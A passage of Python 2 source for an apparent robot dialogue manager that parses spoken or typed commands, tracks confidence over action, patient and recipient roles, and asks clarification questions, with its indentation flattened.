self.confidence_decay_rate = 0.5 #every time the user gives a free response for a command and a past argument is not mentioned again, decay its confidence by this rate
#write core elements to a pickle file indexed by session ID, then shut down
def write_core_elements_to_pickle_and_shutdown(self):
#write core
f = open(self.core_filename,'wb')
pickle.dump([self.current_asp_confidence,self.request_type,self.role_requested,self.last_apr,self.last_role_requested,self.roles_relatively_confident_about,self.current_best_asp_understanding,self.utterances_for_goal,self.utterances_for_clarification,self.utterances_during_dialogue,self.dialogue_accepted_parses],f)
f.close()
#shutdown
f = open(self.push_filename,'w')
f.write("\n".join(self.responses_from_robot)+"\n")
f.close()
self.responses_from_robot = []
sys.exit()
#load core elements from a pickle file indexed by session ID
def load_core_elements_from_pickle(self):
f = open(self.core_filename,'rb')
[self.current_asp_confidence,self.request_type,self.role_requested,self.last_apr,self.last_role_requested,self.roles_relatively_confident_about,self.current_best_asp_understanding,self.utterances_for_goal,self.utterances_for_clarification,self.utterances_during_dialogue,self.dialogue_accepted_parses] = pickle.load(f)
f.close()
#load a mapping from grounded terms to lexicon referring expressions from given word map
def new_given_words(self, given_words):
self.grounded_to_lexicon_map = {}
for w in given_words:
key = given_words[w][1].strip()
if (key in self.grounded_to_lexicon_map):
self.grounded_to_lexicon_map[key].append(w)
else:
self.grounded_to_lexicon_map[key] = [w]
#some boilerplate; max_argmax function
def max_argmax(self,d):
m = None
for key in d:
if (m == None):
m = key
if (d[key] > d[m]):
m = key
if (m == None):
return 0, None
else:
return d[m], m
#boilerplate; dict add function adds all elements of dict B to dict A
def dict_add(self,A,B):
for key in B:
if (type(B[key]) is list):
if (key in A):
A[key].extend(B[key])
else:
A[key] = B[key][:]
elif (type(B[key]) is int):
if (key in A):
A[key] += B[key]
else:
A[key] = B[key]
else:
print "dict_add:\tunsupported element type '"+str(type(B[key]))+"'"
#show text and/or render speech to the user
def vocalize(self, response, text=None, request_type=None, role_requested=None):
if (text == None):
text = not self.vocalize_with_TTS
if (text == True):
print "ROBOT: "+response
else:
print "ROBOT: "+response
os.system("/usr/share/speak \""+response+"\"")
if (request_type == None):
request_type = self.request_type
if (role_requested == None):
role_requested = self.role_requested
self.responses_from_robot.append(response)
f = open(self.log_filename,'a')
f.write("\t".join(["ROBOT",response,str(self.current_asp_confidence),str(self.roles_relatively_confident_about),str(request_type),str(role_requested)])+"\n")
f.close()
#choose a referring expression given a grounded term
def choose_referring_expression(self, gw, words_to_avoid=''):
#don't throw errors if we get bad input; just send it back since it's not going to be verbalized anyway
if (gw == None or gw == False):
return None
#if the gw is a digit, we just return that
if (gw.isdigit() == True):
return gw
#select the first referring expression not contained in the string of words to avoid
chosen_expression = None
for i in range(0,len(self.grounded_to_lexicon_map[gw])):
if (self.grounded_to_lexicon_map[gw][i] not in words_to_avoid):
chosen_expression = self.grounded_to_lexicon_map[gw][i]
#if the vocalization chosen is "me" or "i" from the ontology, we need to flip the POV for the pronoun
if (chosen_expression == "me" or chosen_expression == "i"):
chosen_expression = "you"
#if we arrive here, then all the referring expressions for grounded term are in the words to avoid, so just take the first
if (chosen_expression == None):
chosen_expression = self.grounded_to_lexicon_map[gw][0]
return chosen_expression
#get text and/or speech from the user
def get_user_input(self, text=None):
#if offline, just read from poll file
if (self.run_offline == True):
#extract and sanitize
f = open(self.poll_filename)
user_input = f.read().strip().lower()
user_input = user_input.replace("'s"," s")
user_input = user_input.translate(string.maketrans("",""), string.punctuation)
#log
f = open(self.log_filename,'a')
f.write("\t".join(["USER",user_input])+"\n")
f.close()
return [[user_input,0]] #full confidence value (log-probability) returned with text
#else, do normal online processing
if (text == None):
text = not self.input_with_ASR
if (text == True):
user_input = raw_input()
f = open(self.log_filename,'a')
f.write("\t".join(["USER",user_input])+"\n")
f.close()
return [[user_input,0]] #full confidence value (log-probability) returned with text
else:
#TODO: set recording constants elsewhere
CHUNK = 1024
FORMAT = pyaudio.paInt16
CHANNELS = 1
RATE = 16000
RECORD_SECONDS = 4
#record user command
fn = "user_utterance.wav"
self.vocalize("Press 'enter' and then speak your command")
_ = raw_input()
p = pyaudio.PyAudio()
stream = p.open(format=FORMAT, channels=CHANNELS, rate=RATE, input=True, frames_per_buffer=CHUNK)
print("DEBUG: *recording*")
frames = []
for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):
data = stream.read(CHUNK)
frames.append(data)
print("DEBUG: *done recording*")
stream.stop_stream()
stream.close()
p.terminate()
wf = wave.open(fn, 'wb')
wf.setnchannels(CHANNELS)
wf.setsampwidth(p.get_sample_size(FORMAT))
wf.setframerate(RATE)
wf.writeframes(b''.join(frames))
wf.close()
wavfile = fn
#get n-best understanding from pocketsphinx
results = []
os.system("./sphinx_nbest 1> sphinx_nbest_stdout.txt 2> sphinx_nbest_stderr.txt")
f = open("sphinx_nbest_stdout.txt",'r')
for line in f:
hyp,score = line.strip().split('\t')
score = int(score)
if (hyp not in [r[0] for r in results]):
results.append([hyp,score])
if (len(results) == self.max_asr_understandings_to_consider):
break
f.close()
print "DEBUG: ASR results = "+str(results)
return results
#guess whether an utterance translates to "yes", "no", "nevermind", or something else
def classify_user_utterances(self, utterances_text):
#utterance_class_scores = {utterance_class:0 for utterance_class in self.utterance_class_keywords}
utterance_class_scores = {}
for utterance_class in self.utterance_class_keywords:
utterance_class_scores[utterance_class] = 0
for utterance_text in utterances_text:
for utterance_class in self.utterance_class_keywords:
for keyword in self.utterance_class_keywords[utterance_class]:
if (keyword in utterance_text):
#ad-hoc check for kazunori's name; definitely needs to be removed eventually
if (keyword == 'no' and 'kazunori' in utterance_text):
continue
utterance_class_scores[utterance_class] += 1
maximum_score,max_utterance_class = self.max_argmax(utterance_class_scores)
print "utterance_class_scores="+str(utterance_class_scores)+"; max_utterance_class="+max_utterance_class #DEBUG
if (maximum_score > 0):
return max_utterance_class
else:
return None
#invoke SPF parser and get the semantic parse(s) of the sentence, as well as any new unmapped words in the utterance
def parse_utterance(self, user_utterance_text):
f = open(os.path.join(self.path_to_experiment,'data','test.ccg'),'w')
f.write(user_utterance_text+"\n(lambda $0:e $0)\n")
f.close()
#run parser and read output
os.system('java -jar '+self.path_to_spf+' '+os.path.join(self.path_to_experiment,'test.exp'))
f = open(os.path.join(self.path_to_experiment,'logs','load_and_test.log'),'r')
lines = f.read().split("\n")
parses = []
current_unmapped_sequence = None #[sequence, last_index]
unmapped_words_in_utterance = {}
for i in range(0,len(lines)):
if (' WRONG: ' in lines[i] or 'too many parses' in lines[i]): #found parses
if (' WRONG: ' in lines[i] and len(lines[i].split('WRONG: ')[1]) > 0 and 'parses' not in lines[i].split('WRONG: ')[1]): #one parse
parses.append((lines[i].split('WRONG: ')[1],0))
else: #multiple parses
j = 1 if ' WRONG: ' in lines[i] else 2
while (' Had correct parses: ' not in lines[i+j]):
if ('[S' not in lines[i+j]):
p = lines[i+j][lines[i+j].index('[')+2:]
else:
p = lines[i+j].split(']')[2][1:]
s = float(lines[i+j+1].split()[3])
print s #DEBUG
parses.append((p,s))
j += 3
elif ('EMPTY' in lines[i] and len(lines[i].split()) >= 4 and lines[i].split()[3] == "EMPTY"): #found unmapped word
empty_token = lines[i].split()[1]
if (current_unmapped_sequence == None):
current_unmapped_sequence = [empty_token,i]
elif (i-1 == current_unmapped_sequence[1]):
current_unmapped_sequence[0] += " "+empty_token
current_unmapped_sequence[1] = i
else:
if (current_unmapped_sequence[0] not in self.known_words):
unmapped_words_in_utterance[current_unmapped_sequence[0]] = {}
current_unmapped_sequence = [empty_token,i]
if (current_unmapped_sequence != None and current_unmapped_sequence[0] not in self.known_words):
unmapped_words_in_utterance[current_unmapped_sequence[0]] = {}
f.close()
return parses,unmapped_words_in_utterance
#using list of previous utterances and unmapped words in a current utterance, make fresh alignment guesses
# def update_unmapped_words_alignment_guesses(self, unmapped_words_from_utterances, utterances, unmapped_words_in_utterance):
#
# sys.stderr.write("DEBUG: update_unmapped_words_alignment_guesses called with unmapped_words_in_utterance="+str(unmapped_words_in_utterance)+"\n")
# unmapped_words_from_utterances.append(unmapped_words_in_utterance)
# user_utterance_text = utterances[-1]
# if (len(utterances) > 1):
# for prev in range(2,len(utterances)+1):
# novel_words_in_utterance = [w for w in user_utterance_text.split() if w not in utterances[-prev].split()]
# grounded_terms_in_utterance = []
# for i in range(0,len(novel_words_in_utterance)):
# for j in range(i+1,len(novel_words_in_utterance)+1):
# candidate = " ".join(novel_words_in_utterance[i:j])
# if " ".join(novel_words_in_utterance[i:j]) in self.known_words:
# grounded_terms_in_utterance.append(candidate)
# for unmapped_w in unmapped_words_from_utterances[-prev]:
# for w in grounded_terms_in_utterance:
# if (w in unmapped_words_from_utterances[-prev][unmapped_w]):
# unmapped_words_from_utterances[-prev][unmapped_w][w] += 1
# else:
# unmapped_words_from_utterances[-prev][unmapped_w][w] = 1
# sys.stderr.write("DEBUG: update_unmapped_words_alignment_guesses updated unmapped_words_from_utterances="+str(unmapped_words_from_utterances)+"\n")
#using the mapping of alignment guesses for this set of utterances, update global guesses about referring expression meanings
# def update_all_unmapped_words_guesses(self, unmapped_words_from_utterances):
#
# sys.stderr.write("DEBUG: update_all_unmapped_words_guesses called with current unmapped word/utterance structure "+str(unmapped_words_from_utterances)+"\n")
# for i in range(0,len(unmapped_words_from_utterances)):
# if (len(unmapped_words_from_utterances[i]) > 0):
# for unmapped_w in unmapped_words_from_utterances[i]:
# if (len(unmapped_words_from_utterances[i][unmapped_w]) > 0):
# if (unmapped_w not in self.all_unmapped_words):
# sys.stderr.write("DEBUG: all_unmapped_words adding new count '"+unmapped_w+"'->'"+str(unmapped_words_from_utterances[i][unmapped_w])+"'\n")
# self.all_unmapped_words[unmapped_w] = unmapped_words_from_utterances[i][unmapped_w]
# else:
# for w in unmapped_words_from_utterances[i][unmapped_w]:
# sys.stderr.write("DEBUG: all_unmapped_words adding to existing count '"+unmapped_w+"'->'"+w+"'\n")
# if (w in self.all_unmapped_words[unmapped_w]):
# self.all_unmapped_words[unmapped_w][w] += unmapped_words_from_utterances[i][unmapped_w][w]
# else:
# self.all_unmapped_words[unmapped_w][w] = unmapped_words_from_utterances[i][unmapped_w][w]
#get the action, patient, and recipient from an asp_node based on dialogue knowledge of possible actions
#for ambiguous parses (lists of nodes), distribute confidence based on the number of candidate trees in which various candidate groundings exist
def get_apr_tuple_from_asp_node(self, node):
if (type(node) is not list):
print "DEBUG: get_apr_tuple_from_asp_node: called on node="+str(node)+" with function "+str(node.function)+" and args "+str(node.arguments) #DEBUG
if (node.function == "served"):
return [{"served":self.min_confidence_to_accept},{node.arguments[1]:self.min_confidence_to_accept if node.arguments[1] != None else 0},{node.arguments[0]:self.min_confidence_to_accept if node.arguments[0] != None else 0}]
elif (node.function == "at"):
return [{"at":self.min_confidence_to_accept},{False:self.min_confidence_to_accept},{node.arguments[0]:self.min_confidence_to_accept if node.arguments[0] != None else 0}]
elif (node.function == "query"):
return [{"query":self.min_confidence_to_accept},{node.arguments[0]:self.min_confidence_to_accept if node.arguments[0] != None else 0},{False:self.min_confidence_to_accept}]
else:
sys.stderr.write("ERROR: unrecognized asp node root function '"+node.function+"' in dialogue manager")
else:
print "DEBUG: get_apr_tuple_from_asp_node: called on list of nodes="+str(node) #DEBUG
apr_score_totals = [{},{},{}]
for n in node:
apr = self.get_apr_tuple_from_asp_node(n)
for role in self.asp_role_map:
if (apr[self.asp_role_map[role]].keys()[0] in apr_score_totals[self.asp_role_map[role]]):
apr_score_totals[self.asp_role_map[role]][apr[self.asp_role_map[role]].keys()[0]] += apr[self.asp_role_map[role]][apr[self.asp_role_map[role]].keys()[0]]
else:
apr_score_totals[self.asp_role_map[role]][apr[self.asp_role_map[role]].keys()[0]] = apr[self.asp_role_map[role]][apr[self.asp_role_map[role]].keys()[0]]
for role in self.asp_role_map:
role_score_total = float(sum([apr_score_totals[self.asp_role_map[role]][w] for w in apr_score_totals[self.asp_role_map[role]]]))
if (role_score_total > 0):
for w in apr_score_totals[self.asp_role_map[role]]:
apr_score_totals[self.asp_role_map[role]][w] = apr_score_totals[self.asp_role_map[role]][w] / role_score_total
return apr_score_totals
#given an apr tuple, generate natural language to describe it
def verbalize_apr_tuple(self, apr):
#generate referring expressions for arguments; if user is asking a question, don't use any of the words they used (it looks snarky)
words_to_avoid = self.utterances_for_goal[-1] if apr[self.asp_role_map["action"]] == "query" else ''
patient_ref = self.choose_referring_expression(apr[self.asp_role_map["patient"]],words_to_avoid)
recipient_ref = self.choose_referring_expression(apr[self.asp_role_map["recipient"]],words_to_avoid)
#generate full verbalization
if (apr[self.asp_role_map["action"]] == "served"):
return "bring "+patient_ref+" to "+recipient_ref
elif (apr[self.asp_role_map["action"]] == "at"):
return "walk to "+recipient_ref
elif (apr[self.asp_role_map["action"]] == "query"):
return patient_ref
else:
sys.stderr.write("ERROR: unrecognized apr action '"+apr[self.asp_role_map["action"]]+"' in dialogue manager")
#get a response from user and return the text(s) and classification(s) of the response
def get_user_response(self):
#get and classify utterance
user_utterances = self.get_user_input()
user_utterance_class = self.classify_user_utterances([u[0] for u in user_utterances])
return user_utterances,user_utterance_class
#process unrestricted response from the user and update internal understanding confidences based on parse results
def process_user_initiative_response(self, user_utterances, user_utterance_class):
#give up if user asked to
if (user_utterance_class == "nevermind"):
self.request_type = "terminate" #cease attempt to understand command
self.role_requested = None
return None
#make a pass at understanding
parses_in_utterance_understandings = []
unmapped_words_in_utterance_understandings = []
utterance_scores = []
for user_utterance,utterance_score in user_utterances:
utterance_scores.append(utterance_score)
utterance_parses,unmapped_words_in_utterance_understanding = self.parse_utterance(user_utterance)
parses_in_utterance_understandings.append(utterance_parses)
unmapped_words_in_utterance_understandings.append(unmapped_words_in_utterance_understanding)
#try to map each candidate parse into an ASP node
asp_nodes = []
highest_confidence_index = (0,None) #default to highest-confidence ASR for utterance/alignment
highest_confidence_score = -sys.maxint
for i in range(0,len(user_utterances)):
parses = parses_in_utterance_understandings[i]
sys.stderr.write("parses for understanding '"+user_utterances[i][0]+"'\n")
sys.stderr.write(str(parses)+"\n")
for j in range(0,len(parses)):
asp_node = self.pta.answer_parse_with_asp(parses[j][0])
if (asp_node != None and parses[j][1]+utterance_scores[i] > highest_confidence_score): #score is parse score plus ASR score to determine most confident parse
highest_confidence_index = (i,j)
if (type(asp_node) is list): #ambiguity; we will reduce our confidence in the extractions accordingly
sys.stderr.write("DEBUG: asp translation yielded multiped valid instantiations for parse '"+parses[j][0]+"'\n")
asp_nodes.append([i,j,asp_node])
else:
if (asp_node == None):
sys.stderr.write("DEBUG: asp translation failed for parse '"+parses[j][0]+"'\n")
else:
sys.stderr.write("DEBUG: asp translation successful for parse '"+parses[j][0]+"'\n")
asp_nodes.append([i,j,asp_node])
#choose the "gold" user utterance for future parse (re)training and word alignment guessing
print "DEBUG: highest confidence utterance: '"+str(user_utterances[highest_confidence_index[0]][0])+"'"
if (user_utterances[highest_confidence_index[0]][0] == "(null)"): #the Sphinx ASR didn't pick up any words, so don't consider this further, even for retraining/alignment
return None
if (highest_confidence_index[1] != None): #else, there will have been no successful translations so we will return None when that check is made
highest_confidence_parse = parses_in_utterance_understandings[highest_confidence_index[0]][highest_confidence_index[1]][0]
user_utterance = user_utterances[highest_confidence_index[0]][0]
unmapped_words_in_utterance = unmapped_words_in_utterance_understandings[highest_confidence_index[0]]
#note utterance as a novel way of conveying user goal for this dialogue, then update alignment guesses
self.utterances_for_goal.append(user_utterance)
if ("goal" in self.utterances_during_dialogue):
self.utterances_during_dialogue["goal"].append(user_utterance)
else:
self.utterances_during_dialogue["goal"] = [user_utterance]
#self.update_unmapped_words_alignment_guesses(self.unmapped_words_from_utterances, self.utterances_for_goal, unmapped_words_in_utterance)
#no asp translation produced even a partial ASP node
if (len(asp_nodes) == 0):
return None
#update our confidence in various possible answers using an interpolation of parse confidence and asp ambiguity from multiple instantiation
#role_candidates = {role:[] for role in self.asp_role_map}
role_candidates = {}
for role in self.asp_role_map:
role_candidates[role] = []
for i in range(0,len(asp_nodes)):
apr_tuple = self.get_apr_tuple_from_asp_node(asp_nodes[i][2])
for role in self.asp_role_map:
for candidate in apr_tuple[self.asp_role_map[role]]:
if (candidate == None):
continue
confidence = apr_tuple[self.asp_role_map[role]][candidate] / float(len(asp_nodes)) #confidence is asp ambiguity divided by parser ambiguity; (TODO: tie to parse confidence)
role_candidates[role].append(candidate)
if (candidate in self.current_asp_confidence[self.asp_role_map[role]]):
self.current_asp_confidence[self.asp_role_map[role]][candidate] += (1-self.current_asp_confidence[self.asp_role_map[role]][candidate])*confidence
else:
self.current_asp_confidence[self.asp_role_map[role]][candidate] = confidence
#decay confidences of things unmentioned in the newest parses
for role in self.asp_role_map:
for existing_candidates in self.current_asp_confidence[self.asp_role_map[role]]:
if (existing_candidates not in role_candidates[role]):
self.current_asp_confidence[self.asp_role_map[role]][existing_candidates] = self.current_asp_confidence[self.asp_role_map[role]][existing_candidates]*self.confidence_decay_rate
return highest_confidence_parse
#given a partial instantiation and a particular role to question about, form a coherent question
def verbalize_query_from_partial_apr_tuple(self,apr,role_requested):
sys.stderr.write("DEBUG: verbalize_query_from_partial_apr_tuple apr,role_requested: "+str(apr)+","+str(role_requested)+"\n")
#if asked to verbalize partial, check whether last verbalization was identical and apologize for needing additional clarification
if (self.last_apr != None and apr[self.asp_role_map["action"]] == self.last_apr[self.asp_role_map["action"]] and apr[self.asp_role_map["patient"]] == self.last_apr[self.asp_role_map["patient"]] and apr[self.asp_role_map["recipient"]] == self.last_apr[self.asp_role_map["recipient"]] and role_requested == self.last_role_requested):
self.vocalize("I'm sorry, but I couldn't pinpoint what you meant by that.",request_type="no_clarification_gained",role_requested=None)
self.last_apr = apr
self.last_role_requested = role_requested
#generate referring expressions for arguments
words_to_avoid = self.utterances_for_goal[-1] if apr[self.asp_role_map["action"]] == "query" else ''
patient_ref = self.choose_referring_expression(apr[self.asp_role_map["patient"]],words_to_avoid)
recipient_ref = self.choose_referring_expression(apr[self.asp_role_map["recipient"]],words_to_avoid)
if (role_requested == "action"):
if (apr[self.asp_role_map["action"]] == None):
if (patient_ref == None and recipient_ref != None):
return "What action did you want me to take involving "+recipient_ref+"?"
elif (patient_ref != None and recipient_ref == None):
return "What action did you want me to take involving "+patient_ref+"?"
else:
return "What did you want me to do with "+patient_ref+" for "+recipient_ref+"?"
elif (apr[self.asp_role_map["action"]] == "served"):
if (patient_ref == None and recipient_ref != None):
return "Should I deliver something to "+recipient_ref+"?"
elif (patient_ref != None and recipient_ref == None):
return "Should I bring "+patient_ref+" to someone?"
else:
return "I should deliver something?"
elif (apr[self.asp_role_map["action"]] == "at"):
return "I should walk somewhere?"
elif (role_requested == "patient"):
if (patient_ref == None):
if (apr[self.asp_role_map["action"]] == None and recipient_ref != None):
return "What will be received by "+recipient_ref+"?"
elif (apr[self.asp_role_map["action"]] == "served" and recipient_ref == None):
return "What should I bring?"
elif (apr[self.asp_role_map["action"]] == "served" and recipient_ref != None):
return "What should I bring to "+recipient_ref+"?"
else:
if (apr[self.asp_role_map["action"]] == None and recipient_ref != None):
return "So "+patient_ref+" is for "+recipient_ref+"?"
elif (apr[self.asp_role_map["action"]] == "served" and recipient_ref == None):
return "So I am to deliver "+patient_ref+" to someone?"
elif (role_requested == "recipient"):
if (recipient_ref == None):
if (apr[self.asp_role_map["action"]] == None and patient_ref != None):
return "Who or what is "+patient_ref+" for?"
elif (apr[self.asp_role_map["action"]] == "served"):
if (patient_ref == None):
return "To whom should I bring something?"
else:
return "To whom should I bring "+patient_ref+"?"
elif (apr[self.asp_role_map["action"]] == "at"):
return "Where should I walk?"
else:
if (apr[self.asp_role_map["action"]] == None):
if (patient_ref != None):
return "So "+patient_ref+" is for "+recipient_ref+"?"
else:
return "I should do something involving "+recipient_ref+"?"
elif (apr[self.asp_role_map["action"]] == "served" and patient_ref == None):
return "I am to deliver something to "+recipient_ref+"?"
#using the current understanding confidence scores, determine the next state and verbalize a query for the user
#this is, effectively, our policy function
def articulate_next_state(self):
#use confidence scores to determine what to ask about
#let confidence influence which arguments we're going to consider relatively correct for this question
relatively_confident_about = [None,None,None]
confident_about_at_least_one = False
for role in self.asp_role_map:
if (random.random() < self.current_best_asp_understanding[self.asp_role_map[role]][1]):
relatively_confident_about[self.asp_role_map[role]] = self.current_best_asp_understanding[self.asp_role_map[role]][0]
if (relatively_confident_about[self.asp_role_map[role]] not in [False,None]):
confident_about_at_least_one = True
#ad-hoc check for a situation where an action requiring a patient is chosen but the patient confidence is False; will ask for patient
if (relatively_confident_about[self.asp_role_map["action"]] == "served" and relatively_confident_about[self.asp_role_map["patient"]] == False):
relatively_confident_about[self.asp_role_map["patient"]] = None
if (confident_about_at_least_one == False):
verbal_query = "Sorry I couldn't understand that. Could you reword your original request?"
self.request_type = "user_initiative"
self.role_requested = None
return verbal_query,relatively_confident_about
else:
self.request_type = "system_initiative"
print "DEBUG: articulate_next_state relative confidence="+str(relatively_confident_about) #DEBUG
#if unconfident about one or more arguments, ask for clarification of the one with the least confidence
if (relatively_confident_about[self.asp_role_map["action"]] == "at"): #set single-argument constraints
relatively_confident_about[self.asp_role_map["patient"]] = False
self.role_requested = "recipient"
if (relatively_confident_about[self.asp_role_map["recipient"]] == False): #if believing in walking but have chosen absent recipient, choose unknown instead
relatively_confident_about[self.asp_role_map["recipient"]] = None
if (relatively_confident_about[self.asp_role_map["action"]] == "query"):
if (relatively_confident_about[self.asp_role_map["patient"]] == False):
relatively_confident_about[self.asp_role_map["patient"]] = None
if (relatively_confident_about[self.asp_role_map["action"]] == "served"): #set two-argument constraints
if (relatively_confident_about[self.asp_role_map["recipient"]] == False):
relatively_confident_about[self.asp_role_map["recipient"]] = None
if (relatively_confident_about[self.asp_role_map["patient"]] == False):
relatively_confident_about[self.asp_role_map["patient"]] = None
print "DEBUG: articulate_next_state relative confidence after constraints="+str(relatively_confident_about) #DEBUG
if (None in relatively_confident_about):
if (relatively_confident_about[self.asp_role_map["action"]] == "query"): #can't clarify an unknown query argument
verbal_query = "Sorry I couldn't understand that. Could you reword your question?"
self.request_type = "user_initiative"
self.role_requested = None
return verbal_query,relatively_confident_about
min_conf = min([self.current_best_asp_understanding[self.asp_role_map[role]][1] for role in self.asp_role_map])
self.role_requested = [role for role in self.asp_role_map if self.current_best_asp_understanding[self.asp_role_map[role]][1] == min_conf][0]
if (relatively_confident_about[self.asp_role_map["action"]] == "at"): #another set of constraints
if (self.role_requested == "patient"): #if believe in walking, don't ask about known-to-be-False-patient
self.role_requested = "recipient"
print "articulate_next_state: current_best_asp_understanding="+str(self.current_best_asp_understanding)+"; min_conf="+str(min_conf)+"; role_requested="+str(self.role_requested) #DEBUG
if (relatively_confident_about[self.asp_role_map[self.role_requested]] == None and "goal" in self.dialogue_accepted_parses):
del self.dialogue_accepted_parses["goal"] #if we have to ask for clarification, then the global goal parse currently obtained can't be trusted
verbal_query = self.verbalize_query_from_partial_apr_tuple(relatively_confident_about,self.role_requested)
#if relatively confident about all arguments, ask for global confirmation
else:
if (relatively_confident_about[self.asp_role_map["action"]] == "query"):
if (self.role_requested == "action"):
self.role_requested = "patient"
#verbal_query = "Are you asking a question about '"+self.verbalize_apr_tuple(relatively_confident_about)+"'?"
verbal_query = "'"+self.verbalize_apr_tuple(relatively_confident_about)+"', does that answer your question?"
else:
self.role_requested = "action"
verbal_query = "Are you asking me a question?"
else:
verbal_query = "You want me to "+self.verbalize_apr_tuple(relatively_confident_about)+"?"
return verbal_query,relatively_confident_about
#process a restricted response from the user and update internal understanding based on expected contents of response only
def process_system_initiative_response(self, user_utterances, utterance_class):
print "process_system_initiative_response: current best understanding="+str(self.current_best_asp_understanding)+"; role requested="+str(self.role_requested) #DEBUG
if (utterance_class == "yes"):
self.request_type = None
self.role_requested = None
self.vocalize("I thought so")
for role in self.asp_role_map:
if (self.roles_relatively_confident_about[self.asp_role_map[role]] != None):
self.current_asp_confidence[self.asp_role_map[role]][self.current_best_asp_understanding[self.asp_role_map[role]][0]] = 1
return None
elif (utterance_class == "no"):
self.vocalize("Sorry I misunderstood",request_type="failed_guess",role_requested=None)
if (self.current_best_asp_understanding[self.asp_role_map["action"]][0] != "query" and self.role_requested != None and self.current_best_asp_understanding[self.asp_role_map[self.role_requested]][0] != None): #the user is rejecting a clarification on an argument
self.current_asp_confidence[self.asp_role_map[self.role_requested]][self.current_best_asp_understanding[self.asp_role_map[self.role_requested]][0]] = 0
else: #the user is rejecting an assumption that the system has made; this is the same as a termination request
#temporarily, we are rejecting when 'query' was rejecting too
self.request_type = "terminate"
self.role_requested = None
return None
elif (utterance_class == "nevermind"):
self.request_type = "terminate"
self.role_requested = None
return None
#if this is a system-initiative response with no requested role, it is a confirmation, so if no confirmation/denial was given, we should re-try for it
if (self.role_requested == None):
self.vocalize("I'm not sure whether that means I have the right idea.")
return None
#if sure we're requesting confirmation and confirmation/denial was not given, need to do an exit to re-clarify
if (self.roles_relatively_confident_about[self.asp_role_map[self.role_requested]] != None):
self.vocalize("Let me get a handle on what you want, first.")
return None
#make a pass at understanding by parsing
parses_in_utterance_understandings = []
unmapped_words_in_utterance_understandings = []
utterance_scores = []
for user_utterance,utterance_score in user_utterances:
utterance_scores.append(utterance_score)
utterance_parses,unmapped_words_in_utterance_understanding = self.parse_utterance(user_utterance)
parses_in_utterance_understandings.append(utterance_parses)
unmapped_words_in_utterance_understandings.append(unmapped_words_in_utterance_understanding)
#try to map each candidate parse into an ASP node
asp_nodes = []
highest_confidence_index = (0,None) #default to highest-confidence ASR for utterance/alignment
highest_confidence_score = -sys.maxint
for i in range(0,len(user_utterances)):
parses = parses_in_utterance_understandings[i]
sys.stderr.write("parses for understanding '"+user_utterances[i][0]+"'\n")
sys.stderr.write(str(parses)+"\n")
for j in range(0,len(parses)):
asp_node = self.pta.answer_parse_with_asp(parses[j][0])
if (asp_node != None and parses[j][1]+utterance_scores[i] > highest_confidence_score): #score is parse score plus ASR score to determine most confident parse
highest_confidence_index = (i,j)
if (type(asp_node) is list): #ambiguity; we will reduce our confidence in the extractions accordingly
sys.stderr.write("DEBUG: asp translation yielded multiped valid instantiations for parse '"+parses[j][0]+"'\n")
asp_nodes.append([i,j,asp_node])
else:
if (asp_node == None):
sys.stderr.write("DEBUG: asp translation failed for parse '"+parses[j][0]+"'\n")
else:
sys.stderr.write("DEBUG: asp translation successful for parse '"+parses[j][0]+"'\n")
asp_nodes.append([i,j,asp_node])
#choose the "gold" user utterance for future parse (re)training and word alignment guessing
print "DEBUG: highest confidence utterance: '"+str(user_utterances[highest_confidence_index[0]][0])+"'"
if (highest_confidence_index[1] != None): #else, there will have been no successful translations so we will return None when that check is made
highest_confidence_parse = parses_in_utterance_understandings[highest_confidence_index[0]][highest_confidence_index[1]][0]
user_utterance = user_utterances[highest_confidence_index[0]][0]
unmapped_words_in_utterance = unmapped_words_in_utterance_understandings[highest_confidence_index[0]]
#update alignment guesses
self.utterances_for_clarification.append(user_utterance)
goal_utterances_plus_clarification_utterances = self.utterances_for_goal[:]
goal_utterances_plus_clarification_utterances.extend(self.utterances_for_clarification)
#self.update_unmapped_words_alignment_guesses(self.unmapped_words_from_utterances, goal_utterances_plus_clarification_utterances, unmapped_words_in_utterance)
#if user used single-term response which we have a lexicon mapping for, we can take that as the answer
if (user_utterance in self.known_words and self.known_words[user_utterance][1] in self.grounded_to_lexicon_map):
self.current_asp_confidence[self.asp_role_map[self.role_requested]][self.known_words[user_utterance][1]] = self.min_confidence_to_accept
return self.known_words[user_utterance][1] #return a known semantic parse for the utterance for re-training
#after checking for single-term response and finding none, we know to note whatever was said as an alternative form of an upcoming, known clarification, so we record this
if (self.role_requested in self.utterances_during_dialogue):
self.utterances_during_dialogue[self.role_requested].append(user_utterance)
else:
self.utterances_during_dialogue[self.role_requested] = [user_utterance]
#no parses
if (len(asp_nodes) == 0):
return None
#update our confidence in various possible answers using an interpolation of parse confidence and asp ambiguity from multiple instantiation
role_candidates = []
for i in range(0,len(asp_nodes)):
apr_tuple = self.get_apr_tuple_from_asp_node(asp_nodes[i][2])
print "apr_tuple="+str(apr_tuple) #DEBUG
if (apr_tuple[self.asp_role_map["action"]].keys()[0] == "query"): #if the tuple parsed into a query, the role requested will be put in the "patient" slot
role_requested_location = self.asp_role_map["patient"]
else:
role_requested_location = self.asp_role_map[self.role_requested]
for candidate in apr_tuple[role_requested_location]:
if (candidate == None):
continue
confidence = apr_tuple[role_requested_location][candidate]
role_candidates.append(candidate)
if (candidate in self.current_asp_confidence[self.asp_role_map[self.role_requested]]):
self.current_asp_confidence[self.asp_role_map[self.role_requested]][candidate] += (1-self.current_asp_confidence[self.asp_role_map[self.role_requested]][candidate])*confidence
else:
self.current_asp_confidence[self.asp_role_map[self.role_requested]][candidate] = confidence
#decay those things not mentioned in clarification but involved in the concerned role
for existing_candidates in self.current_asp_confidence[self.asp_role_map[self.role_requested]]:
if (existing_candidates not in role_candidates):
self.current_asp_confidence[self.asp_role_map[self.role_requested]][existing_candidates] = self.current_asp_confidence[self.asp_role_map[self.role_requested]][existing_candidates]*self.confidence_decay_rate
return highest_confidence_parse
#string together an asp goal state from an apr tuple
def write_asp_goal_from_apr_tuple(self, apr):
if (apr["action"] == "served"):
asp_function = apr["action"]+"("+apr["recipient"].split(':')[0]+","+apr["patient"].split(':')[0]+",n)"
elif (apr["action"] == "at"):
asp_function = apr["action"]+"("+apr["recipient"].split(':')[0]+",n)"
elif (apr["action"] == "query"):
asp_function = apr["action"]+"("+apr["patient"]+")"
else:
sys.stderr.write("ERROR: unrecognized apr action '"+apr["action"]+"' in dialogue manager")
return asp_function
#start a command dialogue with the user
def get_command_from_user(self, user_response=None):
#greeting state
self.current_best_asp_understanding = [[None,0],[None,0],[None,0]]
self.current_asp_confidence = [{},{},{}]
self.request_type = "user_initiative"
self.role_requested = None
